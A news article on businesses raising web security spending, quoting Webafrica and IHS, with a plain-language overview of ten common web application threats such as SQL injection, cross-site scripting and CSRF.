Unsafe Web browsing boosts security spend

If a company knows what the threats are, it can arm itself appropriately and get one step ahead of the hackers, says Webafrica.

---

For companies building and running their own Web sites or who have an online business, the cyber world can be a dark and daunting place.

This is according to Myron Salant, Web services product manager at Webafrica, who notes cyber crime in the form of hacking could result in an organisation's Web site being blacklisted by Google - equating to a drop in search rankings, a damaged reputation, and a loss of revenue as the business tries to get its site back up.

A recent IHS report says the majority of threats enter networks through unsafe Web browsing, causing businesses to increase spending on Web security.

Other research by security firm AVG says a compromised Web site is still the most effective attack vector for hackers to install malware on a computer with most of all malware installs occurring in that manner.

"The constant game of cat and mouse played by attacker and attacked leads to technology innovation and increased investment. The amount of growth ebbs and flows, but there is always growth," said Jeff Wilson, research director for cyber security technology at IHS.

For security technology vendors in a crowded market, the best way to separate from the noise is to help buyers consolidate their disjointed security infrastructures.

They also must encourage companies to move security to the cloud, reduce threat exposure windows by embracing orchestration and automation, and discover even the most advanced threats, says Wilson.

In addition, Salant notes many Web site owners only think about security after their site gets hacked.

However, knowledge is power, says Salant, adding if a company knows what the threats are, it can arm itself appropriately and get one step ahead of the hackers.

Salant has identified the top 10 threats to a Web site that businesses should be aware of:

Injection happens when hostile data is sent to an interpreter as part of a query or command. This data tricks the interpreter, resulting in unintended commands and corrupt data. It's a common problem in Web applications, particularly with SQL injection.

When an application sends user-supplied data to a Web browser without first validating or encoding it, cross-site scripting can occur. This lets hackers execute scripts in the victim's browser that hijack user sessions or vandalise Web sites.

Web applications don't always verify that the user is authorised for the target object. Without an access control check or similar protection, supposedly secure data can be accessed and stolen by attackers.

CSRF tricks a victim into submitting fake HTTP requests via cross-site scripting or image tags. It's an issue for Web applications that inadvertently allow hackers to predict the details of a transaction - for example, automatically-generated session cookies. Attackers create hostile Web pages which generate forged requests indistinguishable from real ones.

It's hard to believe but many Web applications still do not properly protect sensitive data such as credit card numbers and personal details. Attackers can easily access poorly encrypted data and use it to commit credit card fraud, identity theft and other data-related crimes.

An application may protect sensitive functionality only by not displaying relevant URLs to unauthorised users. By accessing those ULRs directly, attackers can exploit this weakness to perform unauthorised operations.

Web applications may re-direct and forward visitors to other pages and Web sites without proper validation. Attackers can then re-direct victims to phishing or malware sites or use forwards to access unauthorised pages.

Account credentials and session tokens are sometimes not properly protected. Attackers simply use stolen passwords, keys and authentication tokens to steal other users' identities and commit crimes.

Attackers exploit security configuration weaknesses at any level whether it's the platform, Web server, application server, framework or custom code. These flaws give attackers unauthorised access to default accounts, unused pages, un-patched flaws, unprotected files and system data.

When applications fail to authenticate, encrypt and protect sensitive network traffic, they may support weak algorithms, use expired or invalid certificates, or execute commands incorrectly.